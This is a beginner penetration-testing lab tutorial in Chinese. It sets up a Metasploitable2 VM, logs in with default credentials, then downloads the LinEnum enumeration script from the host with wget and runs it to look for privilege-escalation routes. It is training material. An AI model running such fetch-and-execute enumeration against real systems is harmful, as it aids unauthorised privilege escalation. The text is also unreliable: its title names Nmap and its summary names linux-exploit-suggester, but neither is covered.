使用 Nmap 探索 Linux 提权工具

Beginner

💡 本教程由 AI 辅助翻译自英文原版。如需查看原文,您可以 切换至英文原版

简介

在本实验中,我们将探索两种最常用的 Linux 权限提升自动化工具——LinEnum 和 linux-exploit-suggester。目标是学习如何有效利用这些工具,以在渗透测试或安全评估期间加快权限提升过程。掌握这些工具可以显著节省时间和精力,使你能够专注于理解权限提升的基本原理和方法论。


Skills Graph

环境设置

在这一步骤中,我们将设置 Metasploitable2 虚拟机,它将作为我们的目标系统。按照以下说明启动虚拟机并建立连接:

在我们的实验环境中,Metasploitable2 虚拟机的配置已经预先配置。你可以通过以下步骤启动虚拟机并连接到它:

  1. 打开终端并运行以下命令以启动 Metasploitable2 虚拟机:

    sudo virsh start Metasploitable2
  2. 等待 1-2 分钟,直到虚拟机完全启动并准备就绪。

  3. 验证你可以从主机 ping 通 Metasploitable2 的 IP 地址(192.168.122.102)。

  4. 使用以下命令通过 SSH 连接到 Metasploitable2 虚拟机:

    ssh msfadmin@192.168.122.102

    在首次连接时,系统会提示你接受主机的真实性。输入 yes 并按 Enter 继续。

    然后在提示时输入 msfadmin 的密码:

    msfadmin

成功验证后,你应该会在 Metasploitable2 虚拟机上获得一个低权限的 shell 会话。

LinEnum:自动化 Linux 系统枚举

LinEnum 是一个强大的脚本,能够自动化 Linux 系统的枚举过程,收集有助于权限提升的宝贵信息。按照以下步骤在 Metasploitable2 虚拟机上使用 LinEnum:

  1. 在你的主机上,打开终端并导航到 /tmp 目录:

    cd /tmp

    项目的 /tmp 目录中有一个名为 LinEnum.sh 的脚本。

  2. /tmp 目录中启动一个 Python HTTP 服务器,用于托管 LinEnum 脚本:

    python3 -m http.server 8000
  3. Metasploitable2 VM 上,导航到 /tmp 目录,并使用 wget 从主机上运行的 Python HTTP 服务器下载 LinEnum 脚本:

    导航到 /tmp 目录:

    cd /tmp
    wget 192.168.122.1:8000/LinEnum.sh -P /tmp
  4. 使 LinEnum 脚本可执行:

    chmod +x LinEnum.sh
  5. 执行 LinEnum 脚本并将输出重定向到文件以便进一步分析:

    LinEnum.sh > linenum_output.txt

LinEnum 将执行各种检查并枚举系统信息,以黄色文本突出显示潜在的漏洞或配置错误。请密切关注这些突出显示的区域,因为它们可能揭示权限提升的机会。

总结

在本实验中,我们学习了如何使用两种强大的自动化工具——LinEnum 和 linux-exploit-suggester,来辅助 Linux 系统的权限提升过程。LinEnum 提供了系统信息的全面枚举,突出显示潜在的漏洞和配置错误。linux-exploit-suggester 工具则分析内核版本,并建议可能导致权限提升的相关内核漏洞利用方法。

通过利用这些工具,我们可以简化信息收集和分析阶段,在渗透测试或安全评估期间节省宝贵时间。然而,重要的是要理解这些工具仅用于辅助过程,成功利用漏洞仍然需要对权限提升技术和方法的扎实理解。

在本实验中,我们练习了设置一个易受攻击的虚拟机环境,下载并执行 LinEnum 和 linux-exploit-suggester 脚本,并解释它们的输出。通过本实验获得的实践经验在现实场景中将非常宝贵,因为高效且有效的权限提升是道德黑客和安全专业人员的关键技能。